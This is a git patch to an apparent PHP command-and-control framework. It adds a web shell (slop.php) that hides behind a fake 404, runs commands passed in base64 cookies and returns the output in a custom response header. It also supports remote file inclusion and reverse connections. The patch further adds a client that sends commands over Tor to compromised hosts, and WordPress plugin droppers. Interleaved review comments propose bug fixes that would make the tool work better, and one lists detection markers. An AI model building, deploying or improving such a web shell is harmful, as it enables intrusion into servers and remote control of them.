From 630f01da0d603b7743c7d953aec65056fc739b3c Mon Sep 17 00:00:00 2001 From: oldkingcone <11233163+oldkingcone@users.noreply.github.com> Date: Sun, 31 Dec 2023 18:39:26 -0500 Subject: [PATCH] :smile_cat: Added pagination of information in the database. Client will successfully execute commands and process the output in the users terminal. This will be expanded with more functionality, and the pagination will ALSO be expanded to have more functionality, right now its buggy and is prone if you exceed the last page to not print any results. oops. it happens. Will likely improve upon the pagination portion, just wanted to get it working. --- .gitignore | 3 +- lib/classes.inc.php | 33 ++- lib/composer.json | 3 +- .../genericClientExecuteCommands.php | 16 +- .../genericClientExecuteReverseShell.php | 12 + .../genericClientValidateHosts.php | 14 + lib/database/slopSqlite.php | 58 +++-- lib/fake_the_landing/randomDefaultPage.php | 2 +- .../populateRandomProxies.php | 2 +- slop.php | 241 +++++++++--------- sloppy_client.php | 126 +++++++-- 11 files changed, 328 insertions(+), 182 deletions(-) rename lib/proxies/{ => randomProxies}/populateRandomProxies.php (54%) diff --git a/.gitignore b/.gitignore index e2b6ab0..5f61f68 100644 --- a/.gitignore +++ b/.gitignore @@ -7,5 +7,6 @@ # Editor-based HTTP Client requests /httpRequests/ test.php -lib/vendor/* lib/composer.lock +/lib/vendor/ +/.scache/ diff --git a/lib/classes.inc.php b/lib/classes.inc.php index ba48124..71c5901 100644 --- a/lib/classes.inc.php +++ b/lib/classes.inc.php 
@@ -2,30 +2,41 @@ // auto load include "lib/vendor/autoload.php"; -// custom php classes +//curl stuff +include "lib/curlStuff/defaultClient/genericClientExecuteCommands.php"; +include "lib/curlStuff/defaultClient/genericClientValidateHosts.php"; +include "lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php"; include "lib/curlStuff/validateMeMore/talkToMeDamnit.php"; +include "lib/curlStuff/mainCurl.php"; +//bots include "lib/bots/bot_cmds/doMyBidding.php"; -include "lib/bots/bot_coms/listenToMe.php"; include "lib/bots/bot_esplode/mustRetreat.php"; include "lib/bots/bot_files/hereEatThis.php"; +// make new bots +include "lib/new_bots/makeMeSlim/slimDropper.php"; +include "lib/new_bots/wordpressPlugins/makeMeWordPressing.php"; +//crypto include "lib/crypto/encryptMyComs/hideMyCommunication.php"; include "lib/crypto/needSalt/missingSalt.php"; -include "lib/proxyWorks/confirmProxy.php"; +include "lib/crypto/certMaker/certGenerator.php"; +// config and menu + logo include "lib/config/defaultConfig.php"; -include "lib/fake_the_landing/randomDefaultPage.php"; include "lib/logos/art/artisticStuff.php"; include "lib/logos/menus/mainMenu.php"; -include "lib/new_bots/makeMeSlim/slimDropper.php"; -include "lib/proxies/populateRandomProxies.php"; include "lib/userAgents/agentsList.php"; +// init include "lib/initialization/slop_pg/slop_pg.php"; +include "lib/initialization/initializeC2/initializeC2ConfigFile.php"; +include "lib/fake_the_landing/randomDefaultPage.php"; +//proxies +include "lib/proxies/randomProxies/populateRandomProxies.php"; +include "lib/proxyWorks/confirmProxy.php"; +//database include "lib/database/slopPgSql.php"; include "lib/initialization/slop_sqlite/slop_sqlite.php"; include "lib/database/slopSqlite.php"; -include "lib/initialization/initializeC2/initializeC2ConfigFile.php"; -include "lib/new_bots/wordpressPlugins/makeMeWordPressing.php"; -include "lib/curlStuff/mainCurl.php"; -include "lib/crypto/certMaker/certGenerator.php"; + + use 
config\defaultConfig; @@ -51,5 +62,5 @@ set_include_path(get_include_path() . constant("CUSTOM_PATH_SEPARATOR") . getcwd() . "/lib"); if (!defined("SQL_USE")){ - $a = new initialization\initializeC2\initializeC2ConfigFile(default_config->exportConfigConstants()['slop_home'], true); + $a = new initialization\initializeC2\initializeC2ConfigFile(default_config->exportConfigConstants()['slop_home'], false); } diff --git a/lib/composer.json b/lib/composer.json index 9e62e18..f0febd9 100644 --- a/lib/composer.json +++ b/lib/composer.json @@ -10,6 +10,7 @@ "jenssegers/optimus": "^1.1", "fakerphp/faker": "^1.23", "guzzlehttp/guzzle": "^7.8", - "ext-zlib": "*" + "ext-zlib": "*", + "monolog/monolog": "^3.5" } } diff --git a/lib/curlStuff/defaultClient/genericClientExecuteCommands.php b/lib/curlStuff/defaultClient/genericClientExecuteCommands.php index fa6fccc..6641a98 100644 --- a/lib/curlStuff/defaultClient/genericClientExecuteCommands.php +++ b/lib/curlStuff/defaultClient/genericClientExecuteCommands.php @@ -3,17 +3,31 @@ namespace curlStuff\defaultClient; use GuzzleHttp\Client; +use GuzzleHttp\Cookie\CookieJar; +use GuzzleHttp\HandlerStack; +use GuzzleHttp\Middleware; +use GuzzleHttp\MessageFormatter; +use Monolog\Logger; use Psr\Http\Message\ResponseInterface; +use GuzzleHttp\Exception\ConnectException; class genericClientExecuteCommands extends Client { + private CookieJar $cookieJar; + public function __construct(array $config = []) { + $config['http_errors'] = false; + $config['debug'] = false; parent::__construct($config); } public function head($uri, array $options = []): ResponseInterface { - return $this->head($uri); + try { + return parent::head($uri, $options); + }catch (ConnectException){ + throw new \Exception("\033[0;31mIt appears as though we were not able to connect properly. Please check the supplied information and try again. Are you sure your shell was successfully deployed?\033[0m"); + } } } \ No newline at end of file 
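Review bot: In `lib/curlStuff/defaultClient/genericClientExecuteCommands.php`, the `catch (ConnectException)` in `head()` throws a plain `\Exception` without chaining the original, so the underlying connection error is dropped before anything can log it; bind it and pass it as `previous`, `} catch (ConnectException $e) { throw new \Exception($msg, 0, $e); }`, with the existing message text as `$msg`. The message embeds ANSI colour escapes, which will also be written verbatim to any log file or non-terminal handler that records the exception. `private CookieJar $cookieJar;` is declared but never assigned in this hunk, and `HandlerStack`, `Middleware`, `MessageFormatter` and `Logger` are imported but unused here; initialise the property in the constructor or remove it, since reading an uninitialised typed property raises an `Error`.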
diff --git a/lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php b/lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php index 2b5f70a..cf6d35a 100644 --- a/lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php +++ b/lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php @@ -6,5 +6,17 @@ class genericClientExecuteReverseShell extends Client { + public function __construct(array $config = []) + { + parent::__construct($config); + } + + public function executeReverseShell(array $options = []) + { + // code for executing reverse shell + if (is_null(array_key_last($options))){ + throw new \InvalidArgumentException("\033[0;31moptions cannot be null.\033[0m"); + } + } } \ No newline at end of file diff --git a/lib/curlStuff/defaultClient/genericClientValidateHosts.php b/lib/curlStuff/defaultClient/genericClientValidateHosts.php index 6d9760c..66e2883 100644 --- a/lib/curlStuff/defaultClient/genericClientValidateHosts.php +++ b/lib/curlStuff/defaultClient/genericClientValidateHosts.php @@ -3,6 +3,7 @@ namespace curlStuff\defaultClient; use GuzzleHttp\Client; +use Psr\Http\Message\ResponseInterface; class genericClientValidateHosts extends Client { @@ -10,4 +11,17 @@ public function __construct(array $config = []) { parent::__construct($config); } + + public function head($uri, array $options = []): ResponseInterface + { + if (is_null(array_key_last($options))){ + $options[] = $this->getConfig(); + } + return parent::head($uri, $options); + } + + public function getConfig(string $option = null) + { + return parent::getConfig($option); // TODO: Change the autogenerated stub + } } \ No newline at end of file diff --git a/lib/database/slopSqlite.php b/lib/database/slopSqlite.php index 5137095..80cde1e 100644 --- a/lib/database/slopSqlite.php +++ b/lib/database/slopSqlite.php 
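Review bot: In `genericClientValidateHosts::head()` the fallback `$options[] = $this->getConfig();` appends the whole client configuration as element `0` of the request options instead of merging it. Guzzle reads request options by name, so the appended array is presumably ignored, and the client defaults are applied to every request anyway, which makes the branch unnecessary. `is_null(array_key_last($options))` is an indirect emptiness test; `$options === []` states the intent directly, and the same test appears in `genericClientExecuteReverseShell::executeReverseShell()` with the message "options cannot be null". The `getConfig(string $option = null)` override only forwards to the parent and still carries the `// TODO: Change the autogenerated stub` marker; remove it, or write the parameter as `?string $option = null`, since implicit nullability is deprecated as of PHP 8.4.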
@@ -9,9 +9,13 @@ class slopSqlite extends \SQLite3 { + private array $bot_data; + private $currentRows; + public function __construct(string $filename, int $flags = SQLITE3_OPEN_READWRITE | SQLITE3_OPEN_CREATE) { parent::__construct($filename, $flags); + $this->bot_data = []; } public static function escapeString(string $string): string { @@ -122,7 +126,6 @@ private function insertEncryptedTool(array $data): bool $stmt->bindValue(':is_encrypted', $data['is_encrypted']); return $stmt->execute() !== false; } - private function insertTool(array $data): bool { $stmt = $this->prepare("INSERT INTO sloppy_bots_tools(tool_name, target, base64_encoded_tool, lang, is_encrypted) VALUES(:tool_name, :target, :base64_encoded_tool, :lang, :is_encrypted);"); 
@@ -133,27 +136,46 @@ private function insertTool(array $data): bool $stmt->bindValue(':is_encrypted', $data['is_encrypted']); return $stmt->execute(); } - private function grabAndFormatOutput() - { - $res = $this->query('SELECT id, proto, rhost, uri, uuid, os_flavor, agent, cname, cvalue FROM sloppy_bots_main'); - $rows = []; - while ($row = $res->fetchArray(SQLITE3_ASSOC)) $rows[] = $row; - $output = new ConsoleOutput(); - $table = new Table($output); - $table->setHeaders(array_keys($rows[0])); - $table->setRows($rows); - $table->render(); + public function grabAndFormatOutput(int $lastId = 0, int $itemsPerPage = 20) + { + $query = sprintf( + 'SELECT id, proto, rhost, uri, uuid, os_flavor, agent, cname, cvalue + FROM sloppy_bots_main + WHERE id > %s + ORDER BY id ASC + LIMIT %s', + $lastId, + $itemsPerPage + ); + $res = $this->query($query); + if (!is_bool($res)) { + $rows = []; + while ($row = $res->fetchArray(SQLITE3_ASSOC)) $rows[] = $row; + if (count($rows) === 0){ + return $lastId; + } + $lastId = end($rows)['id']; + $output = new ConsoleOutput(); + $table = new Table($output); + $table->setHeaders(array_keys($rows[0])); + $table->setRows($rows); + $table->render(); + return $lastId; + } else { + return $lastId; + } } + private function selectBot(string $id): array{ + echo $id.PHP_EOL; + $this->bot_data = []; $bot = $this->prepare('SELECT proto, rhost, uri, uuid, os_flavor, agent, cname, cvalue FROM sloppy_bots_main WHERE id = :bot_id'); $bot->bindValue(':bot_id', $id); $r = $bot->execute(); - $ro = []; while ($res = $r->fetchArray(SQLITE3_ASSOC)){ - var_dump($res); - $ro[] = $res; + $this->bot_data[] = $res; } - return $ro; + return $this->bot_data; } public function slopSqlite(array $data): mixed { 
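Review bot: `grabAndFormatOutput()` assembles its SELECT with `sprintf` and `%s`, while the neighbouring methods (`insertTool`, `selectBot`) use `prepare()`/`bindValue()`; only the `int` parameter declarations keep the interpolated values numeric. Prepare it like the others, `WHERE id > :last_id ORDER BY id ASC LIMIT :limit`, and bind with `bindValue(':last_id', $lastId, SQLITE3_INTEGER)` and the same for `:limit`. Every path returns `$lastId`, so the signature can declare `: int`, and the two identical `return $lastId;` branches around `is_bool($res)` collapse into one early return. In `selectBot()` the added `echo $id.PHP_EOL;` looks like leftover debug output, and `$r->fetchArray()` is still reached when `execute()` has returned `false`.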
@@ -163,11 +185,9 @@ public function slopSqlite(array $data): mixed } try{ switch (true) { - case str_contains($data['action'], "fetch"): - $this->grabAndFormatOutput(); - return true; case str_contains($data['action'], "grabBot"): - return $this->selectBot($data['id']); + $this->selectBot($data['botID']); + return $this->bot_data; case str_contains($data['action'], "add_press"): return $this->insertPress($data); case str_contains($data['action'], "add_bot"): diff --git a/lib/fake_the_landing/randomDefaultPage.php b/lib/fake_the_landing/randomDefaultPage.php index 59b3182..237d77c 100644 --- a/lib/fake_the_landing/randomDefaultPage.php +++ b/lib/fake_the_landing/randomDefaultPage.php @@ -3,7 +3,7 @@ namespace fake_the_landing; use config\defaultConfig; - +// look at using react PHP event loops for this. /** * @property string $characters diff --git a/lib/proxies/populateRandomProxies.php b/lib/proxies/randomProxies/populateRandomProxies.php similarity index 54% rename from lib/proxies/populateRandomProxies.php rename to lib/proxies/randomProxies/populateRandomProxies.php index 787913d..bebee20 100644 --- a/lib/proxies/populateRandomProxies.php +++ b/lib/proxies/randomProxies/populateRandomProxies.php 
@@ -1,6 +1,6 @@ $value) { + if (strpos($key, 'HTTP_') === 0) { + $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($key, 5)))))] = $value; + } + } + if (validate_auth($_SERVER['HTTP_USER_AGENT'], $_COOKIE[cname], $_COOKIE['uuid'])) { header("I-Am-Alive: Yes"); banner(); - if ($_SERVER["REQUEST_METHOD"] == "HEAD") { - switch (true) { - case (isset($_SERVER['qs'])): - foreach (checkComs() as $commands => $isenabled) { - $isenabled = trim($isenabled); - if ($isenabled === "Disabled") { - $r = "\033[0;31m{$isenabled}\033[0m"; - } else { - $r = "\033[0;36m{$isenabled}\033[0m"; - } - echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $commands, trim($r)); + switch (true) { + case (isset($_COOKIE['qs'])): + foreach (checkComs() as $commands => $isenabled) { + $isenabled = trim($isenabled); + if ($isenabled === "Disabled") { + $r = "\033[0;31m{$isenabled}\033[0m"; + } else { + $r = "\033[0;36m{$isenabled}\033[0m"; } - foreach (checkShells(slopos) as $shells => $isenabled) { - $isenabled = trim($isenabled); - if ($isenabled === "Disabled") { - $r = "\033[0;31m{$isenabled}\033[0m"; - } else { - $r = "\033[0;36m{$isenabled}\033[0m"; - } - echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $shells, trim($r)); + echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $commands, trim($r)); + } + foreach (checkShells(slopos) as $shells => $isenabled) { + $isenabled = trim($isenabled); + if ($isenabled === "Disabled") { + $r = "\033[0;31m{$isenabled}\033[0m"; + } else { + $r = "\033[0;36m{$isenabled}\033[0m"; } - foreach (parseProtections() as $prots => $isenabled) { - $isenabled = trim($isenabled); - if ($isenabled === "Disabled") { - $r = "\033[0;31m{$isenabled}\033[0m"; - } else { - $r = "\033[0;36m{$isenabled}\033[0m"; - } - echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $prots, trim($r)); + echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $shells, trim($r)); + } + foreach (parseProtections() as $prots => $isenabled) { + $isenabled = trim($isenabled); + if 
($isenabled === "Disabled") { + $r = "\033[0;31m{$isenabled}\033[0m"; + } else { + $r = "\033[0;36m{$isenabled}\033[0m"; } - foreach (checkPack() as $packs => $isenabled) { - $isenabled = trim($isenabled); - if ($isenabled === "Disabled") { - $r = "\033[0;31m{$isenabled}\033[0m"; - } else { - $r = "\033[0;36m{$isenabled}\033[0m"; - } - echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $packs, trim($r)); + echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $prots, trim($r)); + } + foreach (checkPack() as $packs => $isenabled) { + $isenabled = trim($isenabled); + if ($isenabled === "Disabled") { + $r = "\033[0;31m{$isenabled}\033[0m"; + } else { + $r = "\033[0;36m{$isenabled}\033[0m"; } - $fsize = ini_get("max_file_uploads") ? "\033[0;32m" . ini_get("max_file_uploads") . "\033[0m" : "\033[0;31mcannot set max_file_uploads\033[0m"; - $sfem = ini_get("safe_mode") ? "\033[0;32mset to true\033[0m" : "\033[0;31mcannot set safemode.\033[0m"; - $fups = ini_get("file_uploads") ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"; - $maxium_size = ini_get("upload_max_filesize") ? "\033[0;32m" . ini_get("upload_max_filesize") . "\033[0m" : "\033[0;31mcannot set fileupload size.\033[0m"; - $ftd = ini_get("upload_tmp_dir") ? "\033[0;32m" . ini_get("upload_tmp_dir") . "\033[0m" : "\033[0;31mcannot set upload_tmp_dir\033[0m"; - $incp = get_include_path(); - $slopDefines = implode(PHP_EOL, [ - sprintf("slopEncryption: %s", slopEncryption ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), - sprintf("slopOS: \033[0;32m%s\033[0m", slopos), - sprintf("slopShell: \033[0;32m%s\033[0m", sloppyshell), - sprintf("slopTor: %s", slopTor ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), - sprintf("slopPGP: %s", slopPGP ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), - sprintf(".scache full path: %s", scache) - ]); - echo << %s\n", $packs, trim($r)); + } + $fsize = ini_get("max_file_uploads") ? "\033[0;32m" . ini_get("max_file_uploads") . 
"\033[0m" : "\033[0;31mcannot set max_file_uploads\033[0m"; + $sfem = ini_get("safe_mode") ? "\033[0;32mset to true\033[0m" : "\033[0;31mcannot set safemode.\033[0m"; + $fups = ini_get("file_uploads") ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"; + $maxium_size = ini_get("upload_max_filesize") ? "\033[0;32m" . ini_get("upload_max_filesize") . "\033[0m" : "\033[0;31mcannot set fileupload size.\033[0m"; + $ftd = ini_get("upload_tmp_dir") ? "\033[0;32m" . ini_get("upload_tmp_dir") . "\033[0m" : "\033[0;31mcannot set upload_tmp_dir\033[0m"; + $incp = get_include_path(); + $slopDefines = implode(PHP_EOL, [ + sprintf("slopEncryption: %s", slopEncryption ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), + sprintf("slopOS: \033[0;32m%s\033[0m", slopos), + sprintf("slopShell: \033[0;32m%s\033[0m", sloppyshell), + sprintf("slopTor: %s", slopTor ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), + sprintf("slopPGP: %s", slopPGP ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), + sprintf(".scache full path: %s", scache) + ]); + echo << false])); - executeCommands($split); - } elseif ($_SERVER['cr'] === '1b') { - $split = base64_decode($_COOKIE['jsessionid']); - executeCommands($split); - } else { - $s = $_COOKIE['jsessionid']; - $v = explode(".", base64_decode($s)); + break; + case (isset($_COOKIE["cr"])): + if ($_COOKIE['cr'] === "1") { + $split = base64_decode(unserialize(base64_decode($_COOKIE['jsessionid']), ["allowed_classes" => false])); + header(sprintf("D: %s", base64_encode(executeCommands($split)))); + } elseif ($_COOKIE['cr'] === '1b') { + $split = base64_decode($_COOKIE['jsessionid']); + header(sprintf("D: %s", base64_encode(executeCommands($split)))); + } else { + $s = $_COOKIE['jsessionid']; + $v = explode(".", base64_decode($s)); + if (defined("slopEncryption") && slopEncryption) { try { $split = sodium_crypto_aead_chacha20poly1305_decrypt(base64_decode($v[3]), base64_decode($v[2]), base64_decode($v[0]), base64_decode($v[1])); } catch 
(SodiumException $e) { echo "Failed to decrypt: {$e->getMessage()}" . PHP_EOL; } - executeCommands(base64_decode($split)); + header(sprintf("D: %s", base64_encode(executeCommands($split)))); + } else { + header("D: Damnit jim, im a doctor, not a magician."); } - break; - case (isset($_SERVER["doInclude"])): - remoteFileInclude($_SERVER["doInclude"]); - break; - case (isset($_COOKIE["cb64"])): - $aSX = explode(".", $_COOKIE['cb64']); - if (hash("sha512", $_COOKIE['jsessionid'], $binary = false) === $aSX[1]) { - $sp = explode('.', base64_decode($_COOKIE['jsessionid'])); - try { - $final = sodium_crypto_aead_xchacha20poly1305_ietf_decrypt($sp[3], $sp[0], $sp[1], $sp[2]); - } catch (SodiumException $e) { - throw new Exception("I require Sodium!"); - } - $axD = unserialize(base64_decode($final), ['allowed_classes' => false]); - b64($axD, $aSX[0]); + } + break; + case (isset($_COOKIE["doInclude"])): + remoteFileInclude($_COOKIE["doInclude"]); + break; + case (isset($_COOKIE["cb64"])): + $aSX = explode(".", $_COOKIE['cb64']); + if (hash("sha512", $_COOKIE['jsessionid'], $binary = false) === $aSX[1]) { + $sp = explode('.', base64_decode($_COOKIE['jsessionid'])); + try { + $final = sodium_crypto_aead_xchacha20poly1305_ietf_decrypt($sp[3], $sp[0], $sp[1], $sp[2]); + } catch (SodiumException $e) { + throw new Exception("I require Sodium!"); } - break; - case ($_SERVER['REQUEST_METHOD'] === "HEAD" && isset($_COOKIE['jsessionid'])): - $splitter = explode(".", base64_decode($_COOKIE['jsessionid'])); - if (function_exists('pcntl_fork') === true) { - $pid = pcntl_fork(); - if ($pid === -1) { - die("\n\n"); - } else { - pcntl_wait($status); - reverseConnections($splitter[0], $splitter[3], $splitter[1], $splitter[2]); - } + $axD = unserialize(base64_decode($final), ['allowed_classes' => false]); + b64($axD, $aSX[0]); + } + break; + case ($_SERVER['REQUEST_METHOD'] === "HEAD" && isset($_COOKIE['jsessionid'])): + $splitter = explode(".", base64_decode($_COOKIE['jsessionid'])); + if 
(function_exists('pcntl_fork') === true) { + $pid = pcntl_fork(); + if ($pid === -1) { + die("\n\n"); } else { - echo "Cannot fork, as it does not exist on this system..... using passthru\n"; - $re = null; - passthru(reverseConnections($splitter[0], $splitter[3], $splitter[1], $splitter[2]), $re); + pcntl_wait($status); + reverseConnections($splitter[0], $splitter[3], $splitter[1], $splitter[2]); } - break; - default: - break; - } - foreach (uwumodifyme() as $new_data => $d) { - header("{$new_data}: {$d}"); - } - unlink($_SERVER['SCRIPT_FILENAME']); - http_response_code(404); - die(); - } else { - http_response_code(404); - header("File Not Found"); - die(); + } else { + echo "Cannot fork, as it does not exist on this system..... using passthru\n"; + $re = null; + passthru(reverseConnections($splitter[0], $splitter[3], $splitter[1], $splitter[2]), $re); + } + break; + default: + break; } +// foreach (uwumodifyme() as $new_data => $d) { +// header("{$new_data}: {$d}"); +// } +// unlink($_SERVER['SCRIPT_FILENAME']); + die(); + } else { + die(); } } try { + header("Reason: File Not Found", false, 404); slopp(); } catch (Exception $e) { error_log($e, 3, sprintf("%s/ahhhhh.log", scache)); diff --git a/sloppy_client.php b/sloppy_client.php index 243ef1e..4b5b3b4 100644 --- a/sloppy_client.php +++ b/sloppy_client.php 
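Review bot: Nothing in what appears to be `slopp()` restricts the HTTP method any more, and the script no longer deletes itself. With the `REQUEST_METHOD == "HEAD"` wrapper removed and `unlink($_SERVER['SCRIPT_FILENAME'])` commented out, the `qs`, `cr`, `doInclude` and `cb64` cookie branches run on any request type and the file persists in the web root. As far as the visible lines show, input is read from cookies (`cr`, `jsessionid`, `uuid` plus the configured `cname`), and `executeCommands()` output in the `cr` branches is returned as a base64 `D:` response header rather than in the body. For anyone hunting this revision on a web server, the stable markers are a 404 status with `Reason: File Not Found` set before `slopp()` runs, `I-Am-Alive: Yes` on requests that pass `validate_auth()`, and the `D:` header. Response-header matching in proxy or WAF logs and file-integrity monitoring of the web root are the controls that apply. The hunk header and part of the heredoc are missing from the page as extracted, so this covers only the lines shown.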
@@ -2,32 +2,30 @@ require_once "lib/classes.inc.php"; //crypto -use crypto\certMaker\certGenerator; +use curlStuff\defaultClient\genericClientExecuteCommands; +use curlStuff\mainCurl; +use curlStuff\validateMeMore\talkToMeDamnit; +use logos\art\artisticStuff; +use logos\menus\mainMenu; +use new_bots\makeMeSlim\slimDropper; +use new_bots\wordpressPlugins\makeMeWordPressing; +use userAgents\agentsList; + //end crypto //pipe dream. -use fake_the_landing\randomDefaultPage; //end pipe dream. // communications -use curlStuff\validateMeMore\talkToMeDamnit; -use curlStuff\mainCurl; -use userAgents\agentsList; -use proxyWorks\confirmProxy; //end communications // might remove this, since tor is what should be used. -use proxies\populateRandomProxies; // end stuff. // droppers -use new_bots\makeMeSlim\slimDropper; -use new_bots\wordpressPlugins\makeMeWordPressing; // end droppers //graphics and shit -use logos\art\artisticStuff; -use logos\menus\mainMenu; //end graphipcs and shit. $d = default_config; 
@@ -42,38 +40,109 @@ "sqlite" => $configs['sqlite_presets'] ]; -if (str_contains(SQL_USE, "PGSQL")){ +if (str_contains(SQL_USE, "PGSQL")) { $database = new database\slopPgSql($choices['postgres']['pg_host'], $choices['postgres']['pg_user'], $choices['postgres']['pg_pass']); $database->firstRun(); -}else{ +} else { $database = new database\slopSqlite($choices['sqlite']['sqlite_db']); var_dump($database->firstRun()); readline("Press enter to continue."); } - $l->prepareFrames(); $l->displayLogo(); -while (true){ +while (true) { system(CLEAR); $l->displayStaticAsciiLogo(); $m->menu(); $c = strtolower(trim(readline("->"))); - switch ($c){ + switch ($c) { case str_starts_with($c, "sys") !== false: $m->enumSystemMenu(); - $a = new curlStuff\defaultClient\genericClientExecuteCommands(); + $a = new genericClientExecuteCommands(); break; case str_starts_with($c, "rev") !== false: $m->reverseConnectionsMenu(); break; case str_starts_with($c, "com") !== false: $m->commandMenu(); - $database->slopSqlite(['action' => "fetch"]); - $id = readline("\033[0;34mPlease select a bot id to use:\033[0m ->"); - $database->slopSqlite(['action' => "grabBot", "id" => $id]); - var_dump($database); - readline("press enter."); + $page = 0; + $itemsPerPage = 10; + $lastId = 0; + $previous = 0; + do { + $lastId = $database->grabAndFormatOutput($lastId, $itemsPerPage); + $lastPage = ($lastId < $itemsPerPage); + echo "Current Page: " . ($page + 1) . 
"\n"; + echo "Press 'n' for next, 'b' for back, or 'q' to quit: "; + $handle = fopen("php://stdin", "r"); + $action = trim(fgets($handle)); + fclose($handle); + if (is_numeric($action)) { + $selectedEntry = $action; + break; + } + if ($action ==='n') { // next page + if (!$lastPage) { + $page++; + $lastId = $database->grabAndFormatOutput($lastId, $itemsPerPage); + $lastPage = ($lastId < $itemsPerPage); + if ($lastPage) { + echo "You're on the last page.\n"; + } + } else { + echo "You're already on the last page.\n"; + } + } elseif ($action === 'b') { + if ($page > 0) { + $page--; + $lastId -= $itemsPerPage; + $lastId = $database->grabAndFormatOutput($lastId, $itemsPerPage); + } else { + echo "You're on the first page. Cannot go back any further.\n"; + } + } + } while ($action !== "q"); + if ($action === "q"){ + break; + } + $bot = $database->slopSqlite(['action' => "grabBot", "botID" => $selectedEntry]); + $coms = new genericClientExecuteCommands([ + "base_uri" => sprintf("%s://%s", $bot[0]['proto'], $bot[0]['rhost']), + "timeout" => 5, + "allow_redirects" => false, + "proxy" => [ + "http" => $d->tor, + "https" => $d->tor + ], + "cookies" => true, + "protocols" => $bot[0]['proto'], + "strict" => false, + "referrer" => false, + "track-redirects" => true + ] + ); + try { + $command = $coms->head($bot[0]['uri'], + [ + 'headers' => [ + "cr" => "1b", + "User-Agent" => $bot[0]['agent'], + "Cookie" => sprintf("jsessionid=%s; %s=%s; uuid=%s; cr=1b", sprintf("%s", base64_encode(readline("What would you like to execute: "))), $bot[0]['cname'], $bot[0]['cvalue'], $bot[0]['uuid']) + ] + ] + ); + }catch (Exception $e){ + echo $e->getMessage().PHP_EOL; + readline("Exception occured....... Press enter to continue.".PHP_EOL); + break; + } + if (!is_null($command->getHeaderLine('D'))){ + echo sprintf("Command completed!\n\n\033[0;35m%s\033[0m\n\n", base64_decode($command->getHeaderLine("D"))); + }else{ + echo "Command failed successfully.....".PHP_EOL; + } + readline("[ !! 
] PRESS ENTER TO CONTINUE [ !! ]"); break; case str_starts_with($c, "a") !== false: $m->addHostMenu(); @@ -81,10 +150,10 @@ case str_starts_with($c, "cr") !== false: $m->dropperMenu(); $c = trim(strtolower(readline("-> "))); - switch ($c){ - case str_contains($c,"small") !== false: + switch ($c) { + case str_contains($c, "small") !== false: $act_word = trim(readline("Activation Keyword: ")); - if (is_null($act_word) or $act_word === ""){ + if (is_null($act_word) or $act_word === "") { $act_word = bin2hex(openssl_random_pseudo_bytes(24)); } $trj = new makeMeWordPressing($act_word, $agents->getRandomAgent(), bin2hex(openssl_random_pseudo_bytes(10)), bin2hex(openssl_random_pseudo_bytes(50))); @@ -99,7 +168,7 @@ break; case str_contains($c, "chonker") !== false: $act_word = trim(readline("Activation Keyword: ")); - if (is_null($act_word) or $act_word === ""){ + if (is_null($act_word) or $act_word === "") { $act_word = bin2hex(openssl_random_pseudo_bytes(24)); } $trj = new makeMeWordPressing($act_word, $agents->getRandomAgent(), bin2hex(openssl_random_pseudo_bytes(10)), bin2hex(openssl_random_pseudo_bytes(50))); @@ -134,7 +203,7 @@ try { $validateMeMore->checkMultiHost($database->grabOrFormatOutput(['type' => 'all_bots'])["bots"]); } catch (Exception $e) { - echo $e.PHP_EOL; + echo $e . PHP_EOL; } break; case str_starts_with($c, "at") !== false: @@ -153,7 +222,7 @@ $m->generateCertMenu(); break; case str_starts_with($c, "o") !== false: - echo "Current Options: ".PHP_EOL; + echo "Current Options: " . PHP_EOL; print_r($configs); readline("Press enter to continue."); break; @@ -169,4 +238,5 @@ echo "\033[0;31mThat is not a valid command."; break; } + $c = ""; }
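Review bot: The paging loop added to the `com` branch of `sloppy_client.php` fetches more than once per keypress. The top of the `do` block calls `grabAndFormatOutput()`, the `n` branch calls it again, and the next iteration calls it a third time, so pages are skipped and `$page` drifts from what is on screen. `$lastPage = ($lastId < $itemsPerPage)` compares a row id with a page size, and `$lastId -= $itemsPerPage` on `b` assumes ids are contiguous. Fetch once per iteration, decide "last page" from the number of rows returned, and keep a stack of page-start ids for going back. After the loop, `$bot[0]` is dereferenced without checking that the `grabBot` lookup returned a row, so an id that is not in the table produces undefined-offset errors instead of a message. The enclosing `switch` starts before this hunk.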